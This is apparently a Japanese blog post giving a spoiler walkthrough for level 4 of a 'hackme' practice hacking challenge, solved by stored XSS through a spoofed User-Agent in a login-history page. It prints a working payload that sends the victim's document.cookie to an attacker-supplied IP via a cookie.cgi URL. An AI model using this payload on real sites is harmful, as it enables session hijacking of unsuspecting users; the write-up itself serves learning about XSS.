hackme Lv4を攻略(ネタバレあり)
先日ハマったhackmeでLv4クリアしたので解き方をメモしておきます。(Lv1から3はこちら)ネタバレするので自力で解きたい人はこれ以上読まないでください。
もう色々な所でネタバレしちゃってますが、いわゆるXSS攻撃ってやつです。ユーザーが入力した文言がそのまま表示される掲示板などでちゃんとエスケープしないとスクリプト埋め込まれたりするやつです。
ポイントはログイン失敗後、直近5件のログイン履歴がUA付きで表示されるってこと。
流れとしては、UA偽装してわざとログインに失敗してhtmlを改ざん。そして次にログインしてきた人のセッションを自分の用意したプログラムに送って盗むといった感じです。
でも自分でわざわざプログラム作ったりとかはしなくておkです。(それがなんか腑に落ちなかった…)
偽装するUAには↓のものを入れました。
</li><script>document.location="http://(貴方のIP)/cookie.cgi?cookie="+document.cookie;</script><li>
僕は2chとかで書かれていたこれをそのまま使いましたが、問題の性質上cgi名とかはなんでもいいかもしれません。
なんか昔html覚えたての頃にどこかの掲示板で【<!--】って書き込みしてみたらサイトのコンテンツが全部消えてしまったのを思い出した。
それにしてもLv4は腑に落ちない。
